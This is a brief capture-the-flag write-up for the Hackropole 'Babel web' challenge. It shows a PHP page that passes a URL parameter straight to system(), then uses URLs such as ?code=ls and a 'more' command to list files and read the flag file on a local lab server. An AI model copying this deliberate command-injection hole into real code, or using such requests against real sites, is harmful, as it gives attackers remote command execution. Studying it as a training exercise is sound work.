Aller au contenu

Babel web

Hackropole - Babel web

Exploration

Find another page in comment : 

<!-- <a href="?source=1">source</a> -->

http://localhost:8000?source=1

When opened the page we find the PHP source code :

<?php
    if (isset($_GET['source'])) {
        @show_source(__FILE__);
    }  else if(isset($_GET['code'])) {
        print("<pre>");
        @system($_GET['code']);
        print("<pre>");
    } else {
?>
<html>
    <head>
        <title>Bienvenue à Babel Web!</title>
    </head>
    <body>
        <h1>Bienvenue à Babel Web!</h1>
        La page est en cours de développement, merci de revenir plus tard.
        <!-- <a href="?source=1">source</a> -->
    </body>
</html>
<?php
    }
?>

When attempt to access page only <pre></pre> are display.

So try to add some parameters in the URL : http://localhost:8000?code=ls.

Nice we have a lsit of the content in the directory.

<pre>flag.php
index.php
<pre>

Now, try to read flag.php file using more.

http://localhost:8000?code=more

And finally get the flag !

<pre><?php
    $flag = "FCSC{xxxxxx}";
<pre>